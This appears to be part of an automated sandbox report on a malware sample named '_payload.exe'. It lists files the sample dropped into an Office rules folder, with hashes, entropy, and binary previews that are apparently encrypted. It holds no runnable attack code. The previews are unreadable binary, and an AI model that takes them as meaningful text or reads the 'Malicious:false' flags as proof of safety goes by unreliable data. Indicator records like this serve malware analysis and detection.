                                                                                                                                                                      Preview:<?xml.......#.c.S.A..Wl.A...<.y..r+Z6..........>..g..).q.M.!...M..X+..|...7.>c.0.u...Q...-."0............A8..iP.7c>..+.m.|..z.AF..K..-?..bZ.d#.>....@.....!...*........U..M.J{.\"q.T....P..../.4.fC.@....E.%...TDz.L..]2.O..._.To\e.F.F.H..V.D..w.k$.._...!....;.E.XV..R.d.Mv...:...'...+E.<..C.....e....=.U..sDk...%..7....|...x/...l...E`...'[.7I....e..L0t... ..Y...wW..(..N.m..E.&.W/....{...Xl..`J..n.J......q..k:B...p(.. ..J..3u..kA]p.g..m....f....l..g.7A..3...,.%)...7).VD....I.bO.G.....s=.d...pw6K...H.....~y.:m.Ij...Y.8V?.. .]i..R5D[....PK.l.W...........[g...jC..;. .....[....Q...J.M.....A#R.y.e....{.....(...o.-\...?."......X=r?....v*.8p...RY.x<....SN".R....".O~.=..n(.b......u.T.r..@~.w..n.kL....4.Z.I.h.p3.....p..&...x.........aT....8..kf.=.m|.p....v3.(.5.4..3|.7.....#.g..<p.>/....X...;|.{.d].:].Fmr.......%...2....^?F...WV..<...:.?..<Sa`...l.-./...3.Im.?.....5...7.t..xa3H..<.$.l.".x..~.k* B..]......[..&.......G..;...;7^l.n... l5..Y..........h.5...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11464v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):807
                                                                                                                                                                      Entropy (8bit):7.691183293943979
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:knd8DfLvDKqsBR99MnucpZbt64DAowSA7Co5m42bD:kneDfj1sBL9MEuSSA7CoYrD
                                                                                                                                                                      MD5:D9EF9F065AE51487BC488C72E3E2ACCB
                                                                                                                                                                      SHA1:40E816B4263A0F911D5A54214E1149A3177E651F
                                                                                                                                                                      SHA-256:D7966867CE7F210421D614F924867EF88635B26C0A78EFC030C0EB4D3889ED76
                                                                                                                                                                      SHA-512:9FE9B769221D406E1BAC3B50EFF4DB641BFC79F27E5A731C6D5EF6B066F6AE7CE4CB80A2FDC4D65C12E2103D441A15769D59D1DC8F5F8D4DCE53F74EF5FB5213
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...py...6B.X.&..x.3..^.......`i..yr38k4>.).=i."..-!^...t.,.].d...X....&...Uz.........}..6O.h.k.<.._].-.gVG{..1q..C^`.WK.4..=[.....I.j38t$k|-..9.)Lr.7..D.|.e..".1.U.,j.}......'K.h.+.E./]..;.%.....ke~.o...cM..5B...I..x-c...)..YD..6....y...2.5L6....<.... ......a.G..?..o.m..g.4.24.{..9.vhgDb:....y..Cdz...J.-2)..|...a.....;r#...-.E..x...q>.q.}...z..J9.S...$9..i$\d<B...B.e$ ...-Nt......H....!B.h........N.x.y."9]^..?du.;.LF...J.z........q....[y.....Ts....{.'....u..&O{.Wk(.....Z.o.VWz.>.........p.*d.{:f..l..V~.]..f..x.Yf.|%5.I..i.W...0o..q....a..5..U6.QN.k.......=~&5..&}Br..D'...=j.........e...-iw7...R2.....L.p.wu ?k.....F...d.E.f.W_ .E3$5...F9......3...{..X....'R.sN..@.JFR.Z+#..No.+..L~>0...MqY.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11498v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                      Entropy (8bit):7.727007480267561
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:CWuPl4/ZrPvwqqOhp7Kqpp7qwCtAvAsF5GoWNxPaVUqDxfgthV/EbVQtPp3wXSUn:huPlErPvD7KYpGwCGAA5GoMqd4thVcJR
                                                                                                                                                                      MD5:E0015E49DBD369E540A2A63BC1FB3619
                                                                                                                                                                      SHA1:FE31DCC03B0E0951DCCE0E5A2C82D978A962DF1B
                                                                                                                                                                      SHA-256:4B1B60BC11334021BD7A7F23F83C137CB0AE942EE66CD3DFBF87573ED3FBCE71
                                                                                                                                                                      SHA-512:C85023D1F1D724103D581EFB9F09EC22F2621D1C4F55273C4332FDB8ACC57724B22512E33F4D09D282AE18AC28877E5DD7817402E619F9EA2F8B07EF981023E1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml'O9[..7._...).L....t1...|4Cb..P....~.h#....x.U..N..h.W.C.~.x.s..P.....T.d.H...?.!.I7.. .mrTc...t.R..o5.....+..`...~#..<-.......?..'.......r.v...N...\z..a.K......H.S13qX.s....u...C....-...|.h7k.b..J...:u......7.u..B..2_..._G.....K.y.. ...'lw.M+.-E..........YVzA&.-......+.!].%,............t_.C0._n!.0..f.O...t.~..P7F....."o.].W...D..k.T..@.&Hh'(..+..E...a.;.=......9*5.....R...D..v.*+.E..I2j.oEb.%..D..*.v.I.7.D.*-.oJn..{FW4^....l.c...1.l... .}.M.r.1.*......3.......U...OS^..\57..j..Q....v..;@...Z<N...'@'.mjS..k.h.).l .%....;%.....S.1..........x:/...}....Lp$.......Ca..\.Y.l.7c..agR....(6..[.;...V[...V./..D....U.........w......$.Z.n..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11499v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1786
                                                                                                                                                                      Entropy (8bit):7.8857278755119555
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:UDK/NUBIjcFW4r81s/25shAIJegNkgsK1r3uD:lNmIjn1sbAXgN/G
                                                                                                                                                                      MD5:E23E9A77FD0E2B29194ACCFEB31D0339
                                                                                                                                                                      SHA1:DDA0209C129C21498887D2B02943AEB4AF3675C4
                                                                                                                                                                      SHA-256:EE0544C1DF7815A4391B039253A3A2BC282C4BD95FDD65F2E6700046B0CA9C56
                                                                                                                                                                      SHA-512:B8CA04D6066D844F96A6DD81A8F01EF5527118795B2DA113C83DBA887501989B8F4ACD9403447D887D6A9B9925F5FFCC84BC0B8C2E720A5E6D06B9DFBF43CCEA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....'.5.e......g..<~I.j3mUNSx.O..e.Acl.f..GrT...7.5.d......g?^....n.'..g...E..=w..B..=.......r.}.N..N.$.mD...D..Ce)..f.w..U....N..........H.T. >....( l.\..h.n....Q...h..6...o......5...">.O.......C<...w.$:..N}1........f..s)..W.../.uXm.P..\.....&......o.4......h.U..(C..c...;....W..F.9.D.m1D.:B.F./"@>.........E..w..J.qs...(.if.|..q.=..q..B......yn..I.;....R...7B..h...4.........x......|.X...`....A...eox..g...Zn'bMv..*g.v.Rhxz.5[nU..kS...LY.ep.W..._.^.#G....+..~..^v..r.N...~........>....R................7u.?uQ....\..;.~.<q).msl3.2..w.ki.....S"$w......D..?h..k&.n...".....7..........>.#.a...r...e#..FUXIBPN.^..P.1..?l....E$.H9>.kg.U..Y...dj.VbCb.o...Yo..k..g^.@..R..r..&Y~... A..Fa`iY...1....}..9&w........|.....,.{.........4.51:.k^.+#..u.I~.....0=../...h,....3.u....P...r....fu.E.v.4......v2+n.R...|.8E8.*.........g.L.A.......x.ly..yO.-.4..k.X..?.&..:N.......6....8.l"`..iLa.t%V....A.@..>....}..FU^....v.N....._....o..+.3T.&8.4..Y

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11500v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):886
                                                                                                                                                                      Entropy (8bit):7.771943861173832
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:15GjpvFX1S0E+ovmBksN9q9Swv1OF+2bD:fAvje5sNAMwv1OPD
                                                                                                                                                                      MD5:BEBB1DEBCB10F00D276FB801352A7243
                                                                                                                                                                      SHA1:E1C491D77A20960262FF716AB6896B492F82B591
                                                                                                                                                                      SHA-256:CBE5AE76304C73CDBC36BB6714B4FB9B1BEE9267B1211E895F984EF6A7255DC9
                                                                                                                                                                      SHA-512:89311611A08550238DEFE94481B00927F1430A29F838578625AEE14AB6BE5B33AE10A83777663D96C4F11A235BE44BB429AAC8B30A186B8AC32894BF0AFE6E95
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.>c...j%..##.t.g.h@./g...{.'...pf>.....%8..*...%Q..>k...4..1$A.....:?.a...bK].[j...w...-..D..?^...>.C..=..z.$..m.4......>.sIn......b#..o.%..l....XK...(..$i...u............s0@9x..|......O.]#..1.Tji.#h.b.9K.V.U!...n1.M..{V..5....S.)r......R....d....-]......T...../...........#.].-..>].>...B...z6g.Fd..0D.sN...%..H..@.k.1...#u.aQ/.b..i2m..N..8\....VART.#.M.....b."`.....${`w..4Bf.?...*..l.O..'.y`b5.E..f.$...}.....[...A.......wr?..~.JG.T.C....M}.C[....Wj....%...9.fE....y..o...._'.I.v..V;..l.....2..J9.F..'...{..Lh...D......$...%G.....f..c.i.+}.I.....;,a...V..@.q...P.g.H...L8L.Zk~r.e.....%7W..cdW.}....U..........O...&V..@".......Y..h..W.:..`.o.}.)..o.K.p...1...[P.n.. M).....iG.......?..vn2.s`i..~i........`..t.Nc.)9..9..4......D,o....G..S...+...f%<...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11502v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1324
                                                                                                                                                                      Entropy (8bit):7.8453472422333075
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:mStKMJcXN7JC0uMVMJCNgqBXzkc7/rZn3yysa9AwssgFoVM1pzI5G4yBejEWnS/j:dtKM6XN9C0ZVM3qRRXsWzWoac5G4Kejo
                                                                                                                                                                      MD5:F344571CA985BFE64E3373DC7F0098A6
                                                                                                                                                                      SHA1:8B28A26767239EC0E280D63D2EF43077D116C279
                                                                                                                                                                      SHA-256:95B292C34AFFA123B6E79E68E9186F2045FA6B2067C1AF355B0CDCECC7F57AEA
                                                                                                                                                                      SHA-512:42E9F1775F7607591BBBBF5A01D102779F7C555985D80D06C1F67EA6ADAA07E92A5D673263E8C5541764B2272940586B282FB7402DF40A8E3FBF958A12C3DA56
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.3..+J.....^.-..).Y.>Lltw.-...B&WB...e5.(.=sr.j.o.QxR....].../x7i...q...Y).sk..j[..$.E._..,;.K..........*.DV|k.9.....{P......Mm..Y.....0...(...............g...cm.R..._,SB.{.g.|j..@.c..F.~.u..vF. ..3...i.npgi7..%P|c^....Q.2...d.......8zQ..../..v.....n...4...(..I....L.T.g.gy....cy}.S..=.Y%..G....n6C.....~..!....q..br...Np..d.....l8..=......p.r.......d4........(..>S..y.f..H....K..8.A.-..!.eE..N8...&.......$.]%.E..T..A...3..D.*..H&.~..<..oA.....\..^....m...753......5.E.....dw.......>.........J..x..'......@..r..f.O.....X......9.........KU...A.P..>.4;.k....G6...CW4\&!.I..9...ur.../.....)Gip....n^.A..}.......Q.].?1N...Z.{.w+....9>.......N%.r;I..A4..I....Y..y.;.u....(......7.*.........R.....7'..j@i..y4l8....m.wM..L.Lx..b2..`<}f.u........6...+.?.........V.f......*....... .;....5.V..0......jJ/v.`H...y..k....D ..t........N.|..'....#N..X.(Ew..!3.E......OIw....x.l2.s.So1.z.]#B.....6.1..2.......Lgm..B..xn).0S.........|..@....4 ...s...x..!

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11504v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1435
                                                                                                                                                                      Entropy (8bit):7.832008103588492
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WqPyRA3Emz6AcN0OdVRB2C6sF4iCoaiNgqtC4t33GclCeLAbRYRpu4+2bD:0eZUN0OdVRMYKVoasxt3WaCzbRuD
                                                                                                                                                                      MD5:F715FC8DE90892DB6EFCBCC4C03A9F92
                                                                                                                                                                      SHA1:31557816D5896558A0ADB3114A085ACC3802C600
                                                                                                                                                                      SHA-256:869DFF5D3BA4ADE6B303FC6377D4AE6486002F290367CE4844275E8F14018A94
                                                                                                                                                                      SHA-512:E300C85A915AE3FE50ABD192222536A5C8725C6AEB8F9A7B5B25600A61198F826F9C5BB76FDD2D63A85DB6C5E0B10807784FE930543CBF100F3DC4E0D0484885
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlNz..g..O......n.....&u.t.|6@.;Eq..a<.+..K......T3..G.U.01}..,.U.....#.E..5Q..EC..!b..B....%u...^.Zq....)l.{6-t}...D....}....u.c.w.....|..&j...O...v...|Z....^....8+Y.#+...-%K..$(b.o..!.)w.".O..v-.(...9.....`..C-...V.+......f4O.......U.7,?.a..6vZ.kl...^~.;^.\..~.FiP.@..K..#.8.*.h$.Eu.J.....l..kM.,W.@.MK.p.?..."...k.I6..ns.tD(M.."M.....u....F.........K.>;r.[.^...`a...cU.zex..~.\q.%l._...C.\...R%.f.n`@, ..y.0v.m&H..>.f."...c.E.p.g2.W5+..A,.%^.h.W..u.D........G#..34............\....Z|1)...J.u...Vr.l..rY..<._....s.......* .;.(./...<0W..>.....F.hwa.E.=d/..W...F....Z.......0d...,hCS...[...9M..Q.....a.j.6K...[to.x\.a6?.; ....:-W..4n.A?...3.U..l.^m.!.Mwq5.,)^.....x.FlAwk....H..w.S.k.-Y6.@.Z)Y..IlAr._..''-.`?_B...E.T7...3bX....y......w..b]Qx..v.mQ,.|;r..ig:.VO..>p..}.....5.I#. _hK..............0...Y...K{..j../.[h.......Ul"...V....8.vl...$.._J..d.M{.-..eQ....d.h.&..&..:...a..B.:,....u/.:x.. ..w......DA..x...[e......;.j&.8...y..=.......v|I..9..N^[...,.3

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11514v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7119
                                                                                                                                                                      Entropy (8bit):7.975723244637145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:m+kRYy0MOx7u7e7SJXiOQXJI3uF1i2h5bVBJvx3I:nkqytgu76SJXOJWIwO5hBFFI
                                                                                                                                                                      MD5:1CA49C50788064FDBEEDEFAFBAF15167
                                                                                                                                                                      SHA1:07843DC11B6AFAE7CE3142ADEF88F944B0555BB8
                                                                                                                                                                      SHA-256:30755F312F57D9DA90302C3E8EEE5275708FB6118BFE2056B2E11126E431274F
                                                                                                                                                                      SHA-512:8B60B07DF7C17FDE420E00385582A0323CAA5D215BDB29825FCB0B36FC5D5C87D120329085A68F15F010BD9BABFA24469C56C5AEBB6E1320436A58BD03C2F43E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlj...;Qf#......Q.....N.[.2.]d|M.;.g.b....w.Yrj.U.....-.v#......J}.5v..m!..G.jYj.H.S..a...9..F..'..f5.l.2.i._.]0v....u.u*.F.h...eYP.....Q}*....MW..._.e...]..}.o....C>\a...t ~.cG..v..3u..b(O.~....E....D}...nWAV}....fw...|.....6...o.@.....Z.....7.{...2.@..0m.....V..FX1.)..G.2)|....5G.f.....DWI.....A.D'.\.b."y...y.!w..L.e..z..#,...%....b..k..8.r^..}....jG.......!Dv.p.....L.YQ....>....yof.u.V..xdH..Uy...mv^......0}.3..W...YAU.....d....'.3.....b@.t.....$...#.p..>........u.4}.E...H........lb......g,.Vk.%.\Y....$./....xx.,.p$....A.s.z.9..+'..Y.~X....N..{....Q.M..'...@..+..ANz.X-n.=...X......i....KKG.....Ev......~..AQ...ke..G.H..._..er.Z...J..x.......-.{.^...b~;A...}_A.k@G..G}..7Q...!..o..E..=4-.9O.S._.}.!................n.!r.........A.7....Y9=.k.s.Z...Q......B..W...-.R.m/)...;t.O...0..yp...6.h.Ng..}....j..=od..v!.Z.0..R..W..?.....X....c........S..ZFh..S...o.......4......y..j+QkaM5..8...C./oU]..m.~.E<Vf.......Q8.......w..|.?....+.....kr....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11659v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):762
                                                                                                                                                                      Entropy (8bit):7.740521502135843
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:N2PfvsipmjpFNooA1bmREgeJAtFg0sLIPwt+dM495z0+zktVEixuPXwmJNdh2jsB:N2nvQjpmmREBiPl8ngw+zktScuPXwmJl
                                                                                                                                                                      MD5:BCB5DF1E55334F10AD97396F599D0B0D
                                                                                                                                                                      SHA1:6BFF1A224BDAB2599285311622494628D7C94DF5
                                                                                                                                                                      SHA-256:714AC5C3B470D966D5E1E8F825F964245517A4861BCE8F81E051975DDE4AB94C
                                                                                                                                                                      SHA-512:699D330BBCCD7A9DA0830348F4ACAF7C5DD55BEFAF1B251073726BE6051CF149901D21AC7F84965AD42A3EA01D9FE206BB3DC8FB02959FA0D5A2F45AF5823E37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....(.$..M@[4"......x.. m.!.v..3. cn..dV.w.[e..,c.....f]C}/.L2..X{..E....a.m./....../.O7..{M.r...[u.g2'...::.........y.G.M5A..].H....ZP./&]].Cu.U....1...O{..Pj....@...9.c(...'S..B..A..In._.I.:Z9....t...'0.R.n......e^)..Q...*.<%...).(..3!.+L........f...['.....tg...D.........4E.}..........^....0..\T._.....X..p...v3:...b...x.GI...)....A.[.:./.%.K=..k...pU...Y.'+...!...K(;Y=.5.rI......."[.F4...(..Y.0.....H..S...l.B.....}.}..g..tw.nv~.......z....o2...#...x.{a).j.....7sW.....>.`.DW..@...Rd....s.Q0.T...>iG.40.......(.!.........7.^...d......(..).....wfyw.p......4g.W1.'r..*....64..tB%..E.SLW........pU..U..(1..|......"....b`...e...[..:.F....9 mc..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1463
                                                                                                                                                                      Entropy (8bit):7.857405814449391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gwtaP8nTX/caCvutwL3FyXJUYaAh3oZTcLaaGHz/2I1wtlma7B2bD:gwt28nL/ca4utwL3Y5UrABo1yGz+DnFm
                                                                                                                                                                      MD5:D9E7BE48D3C490B8F051A7FB0AD4C45D
                                                                                                                                                                      SHA1:C481B7EE1431D063B6179DFA6FDA8A4FFFE50C22
                                                                                                                                                                      SHA-256:11FDDF61B039853664A79CDBFAB271BCD6EA54A03B0A75A8552B7B7A747BEDBA
                                                                                                                                                                      SHA-512:A507D2E5D454287CFA78221D839BD4A7D7686AE45A9D05F776B8AB7E12042B83CE72324C2CC98D3D582AE881A6C594B30EC477526A3241FE2EC47BB33A698027
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.*.6q....VyY~.....+A8.?...a.K..<T..z......>.(..YW..G[..4t..6.f.....S..]...;@.b.BD..m..R..B..~.t......>.C..\,....'.x.....|OKv...^B.K..~....C....r..T...0V.$`.{.#..Q..`A{2....n:...&..j_B......./i.F.}...N. .h.l..k&.@.'"q...v...(...4..:L..*0II6pAX.@.;H..._..+.5.....a.gqhu......?d@X"....;............~E.=:,......|h{.....h.<.c.j.Go.S]nI.7_*.........<....{.....ee..u_...H...se......&..!..._..~....w~.F.C.$...........d..j.o....%.l....9..U]B.2......Z.....7.)Z....>.\gF.ti..I..0..|C.....L{T*.....u3.W@Ml......xn._.......s.iY..P.3.vi5.wJ..I..l.;..J...HK.)..m~.@..~.}3Q..N-..y8...d..C....._...a.....MO.:>.,.R.....k.D.z..uB;...P%..2..u.o_.D.../.@C...t..\z....M.6..,..;./.!.....d}.V84.TjNV.P.D...*..g........Uy9..v0.....1....G...3..%S.$...@f...9.[.H.p./..!Q....lT*.Y...} ..F...1@....G.r..VN.~.O..e....7......)7...D}u.R_.OKx2....V...L..OF.........:e.b.g..8...B?n..@.R.J@ .:7..../...#.f?J...V.}K.Yf...u...u.8"...w@...7..G......2...{.z..rX._.}.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11705v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3505
                                                                                                                                                                      Entropy (8bit):7.952757108639185
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:CZA0cRHp3xvtgvDbVZhKeEiJL77aVQrcRhawK:CZdcxpxlgvvVrYsfmWrcRhTK
                                                                                                                                                                      MD5:28141E719C1ED8AE3F66A37AE9A3F590
                                                                                                                                                                      SHA1:78CB54EB4A2A5267ACF4A563E47C99917E96955C
                                                                                                                                                                      SHA-256:B742CE91C23AC5CFC19337F18BF983A7BEC00793E071C261CEF9ECDAC12EB1EC
                                                                                                                                                                      SHA-512:B6252AC70C9EDF86A90E5E72A0A11E7BB63FF78F40857C2A6F1816A5BEB9A616F9A2E7C229DADC5249E2A027040577E3B0B6F86EA0209DD5227A7CA6CC15C41C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml rC...#...'.[...Kd}......K.Qh..\w..+~Q!...%.K...3[.q9....W..K.9.E'^>...)..e.@*....`...u...Ez/)....JZ7.3..w..^..o^MXZ.aN......D.U......#k.........w..>....X'...y......s..N..h$...Br..Xe....8^..x...<T5..D.g4}Uw.Ai~...\..x........a.2.R.6........m..[L0X. "ZD. M...\...x3.$.i...M:....*I........".S11.x..cNr.r..G....d.#....1.6..v.....9.......V0.M_.......'......=...8.......q(.2..v.xb...b..H.W?..+,C.@o.......1z.f..B....Xr'}'b...3.v.n...}..\...H/...~.b.....`{.J.v.......n.....J9j.....D...<....d....-. ..I6.....poH.XW&dN+.,1.....7G.MZ_.;.f...yq[....u..1A....@.k..@..b...#....JK..h..0.S=*.:}.L;wo..fj$..Z....n.......V[[O.k..!..i.rY.B.Dl...?..rw.....U....X`..m.HI.>.E0..~h. ._E....0..S..5yBTI.m/._...bf.J..R..Ll..........K/!...q#.v-).>a.W.6..d..hcr.K...c.j. ^.~....K.:w".X..Az..2:o.....R.k......Xl.......F...:f.b_..:.....3.....9.ja.".._.=...0+..W...H#3m...p6LM.&....O|........f%.2..Z..+...lQY..}E.v?..._....kU...7Q.....-.x.U.;.g..,&.~..J..\.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11710v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                      Entropy (8bit):7.759416518041001
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:W1P+C0QOPqJ+ScOAcm+sA+dVFCBR0YIK3pO2bD:W12aWy+SFlSdmBtP3p1D
                                                                                                                                                                      MD5:63D71D2FD325624CB6A7B78C3CC096D5
                                                                                                                                                                      SHA1:EF6D810624CB7D7B7CA11011BEF207F17B4E5000
                                                                                                                                                                      SHA-256:84AE6ED4CB597551C017A4EAD49FFAD88B40077242FD2C79B6792A3482EE5B7A
                                                                                                                                                                      SHA-512:0571629823A46A9F24E6EFBE4AD569C11FEDDC270BFB99E5F7903D3B302A79F3B0565BDE4D9A009FEBA3C95B19865DF99FEF1BEE8889107C41337F9AD36710EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlDE2,..{...?..Ym.......a##.!.......=.X....'..1PIV`.dM..(..eFH..9...oY...D2Bn.M..B.yJsIGV*...E.w.0.............Q.?)4.6o...o...,.N..cDE.5.{.AqL..Gq.^A..v.I&b}.q..h,.....)o...4..,c...K...`........O.K.1....*+.yw>.....D.oC.$....]....*O.u...v!..ed.......&.5.....2....".a)........*[.U....nD.l.c..... (&.U..s.YV~.....B..Q.J#|)`.aljy..<w,.....}....>." ....k\.v.w...x..F.r.......qt.....e..........3.?`.XYr..3.......Q..._.VI.........}.......)E......F..A...R[.".d...]...s....sB."RQS.vP.#..C..V9...c..:~..'.......yaZ....:B% 4.......:V.......n.)...)..by.}....z. .......Yj ......tl0C6..]SF.(9A.....e..I...f.....")..1......B..7g.P..i..c..@..<F..."F....<h.^.B..R.#..k....9.fh.1.M..t*y...p._..%...m$}.0#.Xmb......M6......# .E..l....#..f-KS.....|.vM3EJ..u..q........).D.0.^l..,...`..I.8.I.j)..vG..9#.<..;.`.{........u.f...3..A..7......7..........s<..d..X."K6..H..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11767v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2983
                                                                                                                                                                      Entropy (8bit):7.936950458927072
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Pqw4sBm/8FKsNsCCpEYjcM2ML2AF99S3H8pA5ql2vU4Xp38aIW6oD:/Xm/8YjuocMpLr7Aude8aV60
                                                                                                                                                                      MD5:388FEAF1FE2A2DFDF9A04D1BF4EB8A41
                                                                                                                                                                      SHA1:2BF473871C122B3FB4C00262A54C928B3B257389
                                                                                                                                                                      SHA-256:77AD01AD830B748C65CD8A6D82F5D8B95F6C4735FBC1C6CF01AB191D927AA9CE
                                                                                                                                                                      SHA-512:A04CDAFC4C3AF363267DA6C3D62CFB428294539389ED59F9CC7E8AC872E3D2969103D240A45C6DF3432178EAEE0D28AE36096944ED5A41A5E6D75A778B5145E1
                                                                                                                                                                      Malicious:false
